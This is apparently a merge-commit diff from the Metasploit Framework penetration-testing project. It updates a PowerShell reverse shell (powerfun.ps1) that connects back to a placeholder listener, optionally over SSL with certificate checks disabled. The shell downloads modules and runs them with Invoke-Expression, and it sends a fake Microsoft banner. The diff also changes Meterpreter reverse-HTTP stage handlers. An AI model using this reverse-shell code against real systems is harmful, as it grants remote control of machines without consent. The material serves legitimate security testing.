Merge branch 'master' of github.com:rapid7/metasploit-framework

Author: shuckins-r7

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 0.0.3)
+      metasploit-payloads (= 0.0.5)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (0.0.3)
+    metasploit-payloads (0.0.5)
     metasploit_data_models (1.0.1)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

data/exploits/powershell/powerfun.ps1

@@ -10,8 +10,9 @@ function Get-Webclient
 function powerfun 
 { 
     Param( 
-        [String]$Command,
-        [String]$Download
+    [String]$Command,
+    [String]$Sslcon,
+    [String]$Download
     ) 
     Process {
     $modules = @(MODULES_REPLACE)  
@@ -25,19 +26,33 @@ function powerfun
     {
         $client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
     }
+
     $stream = $client.GetStream()
+
+    if ($Sslcon -eq "true") 
+    {
+        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+        $sslStream.AuthenticateAsClient("LHOST_REPLACE") 
+        $stream = $sslStream 
+    }
+
     [byte[]]$bytes = 0..255|%{0}
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+
     if ($Download -eq "true")
     {
+        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
+        $stream.Write($sendbytes,0,$sendbytes.Length)
         ForEach ($module in $modules)
         {
             (Get-Webclient).DownloadString($module)|Invoke-Expression
-        } 
+        }
     }
-    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
-    $stream.Write($sendbytes,0,$sendbytes.Length)
+
     $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
     $stream.Write($sendbytes,0,$sendbytes.Length)
+
     while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
     {
         $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding

lib/msf/base/sessions/meterpreter.rb

@@ -307,6 +307,8 @@ def is_valid_session?(timeout=10)
 
     begin
       self.machine_id = self.core.machine_id(timeout)
+      self.payload_uuid ||= self.core.uuid(timeout)
+
       return true
     rescue ::Rex::Post::Meterpreter::RequestError
       # This meterpreter doesn't support core_machine_id
@@ -326,8 +328,8 @@ def load_session_info()
     begin
       ::Timeout.timeout(60) do
         # Gather username/system information
-        username  = self.sys.config.getuid
-        sysinfo   = self.sys.config.sysinfo
+        username = self.sys.config.getuid
+        sysinfo  = self.sys.config.sysinfo
 
         safe_info = "#{username} @ #{sysinfo['Computer']}"
         safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)

lib/msf/base/sessions/meterpreter_options.rb

@@ -18,7 +18,6 @@ def initialize(info = {})
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
         OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
         OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
-        OptBool.new('StagerCloseListenSocket', [false, "Close the listen socket in the stager", false]),
         OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
         OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
         OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),

lib/msf/core/handler/reverse_hop_http.rb

@@ -90,7 +90,7 @@ def start_handler
     ReverseHopHttp.hop_handlers[full_uri] = self
     self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
         self) do |uri, hop_http|
-      hop_http.send_new_stage # send stage to hop
+      hop_http.send_new_stage(uri) # send stage to hop
       delay = 1 # poll delay
       # Continue to loop as long as at least one handler or one session is depending on us
       until hop_http.refs < 1 && hop_http.handlers.empty?
@@ -138,7 +138,7 @@ def start_handler
               :ssl                => false,
             })
             # send new stage to hop so next inbound session will get a unique ID.
-            hop_http.send_new_stage
+            hop_http.send_new_stage(uri)
           else
             hop_http.lock.unlock
           end
@@ -241,34 +241,27 @@ def initialize(info = {})
   #
   # Generates and sends a stage up to the hop point to be ready for the next client
   #
-  def send_new_stage
-    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+  def send_new_stage(uri)
+    # try to get the UUID out of the existing URI
+    info = process_uri_resource(uri)
+    uuid = info[:uuid] || Msf::Payload::UUID.new
+
+    # generate a new connect
+    sum = uri_checksum_lookup(:connect)
+    conn_id = generate_uri_uuid(sum, uuid)
     url = full_uri + conn_id + "/\x00"
 
     print_status("Preparing stage for next session #{conn_id}")
-    blob = stage_payload
-    #
-    # Patch options into the payload
-    #
-    Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
-      :ssl            => ssl?,
-      :url            => url,
-      :expiration     => datastore['SessionExpirationTimeout'],
-      :comm_timeout   => datastore['SessionCommunicationTimeout'],
-      :ua             => datastore['MeterpreterUserAgent'],
-      :proxy_host     => datastore['PayloadProxyHost'],
-      :proxy_port     => datastore['PayloadProxyPort'],
-      :proxy_type     => datastore['PayloadProxyType'],
-      :proxy_user     => datastore['PayloadProxyUser'],
-      :proxy_pass     => datastore['PayloadProxyPass'])
-
-    blob = encode_stage(blob)
+    blob = stage_payload(
+      uuid: uuid,
+      uri:  conn_id
+    )
 
     #send up
     crequest = mclient.request_raw(
         'method' => 'POST',
         'uri' => control,
-        'data' => blob,
+        'data' => encode_stage(blob),
         'headers' => {'X-init' => 'true'}
     )
     res = mclient.send_recv(crequest)

lib/msf/core/handler/reverse_http.rb

@@ -1,7 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
-require 'rex/payloads/meterpreter/patch'
 require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter/packet'
 require 'rex/parser/x509_certificate'
@@ -324,27 +323,12 @@ def on_request(cli, req, obj)
 
         resp['Content-Type'] = 'application/octet-stream'
 
-        blob = obj.stage_payload
-
-        verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                             datastore['HandlerSSLCert'])
-        #
-        # Patch options into the payload
-        #
-        Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
-          :ssl           => ssl?,
-          :url           => url,
-          :ssl_cert_hash => verify_cert_hash,
-          :expiration    => datastore['SessionExpirationTimeout'].to_i,
-          :comm_timeout  => datastore['SessionCommunicationTimeout'].to_i,
-          :retry_total   => datastore['SessionRetryTotal'].to_i,
-          :retry_wait    => datastore['SessionRetryWait'].to_i,
-          :ua            => datastore['MeterpreterUserAgent'],
-          :proxy_host    => datastore['PayloadProxyHost'],
-          :proxy_port    => datastore['PayloadProxyPort'],
-          :proxy_type    => datastore['PayloadProxyType'],
-          :proxy_user    => datastore['PayloadProxyUser'],
-          :proxy_pass    => datastore['PayloadProxyPass'])
+        # generate the stage, but pass in the existing UUID and connection id so that
+        # we don't get new ones generated.
+        blob = obj.stage_payload(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         resp.body = encode_stage(blob)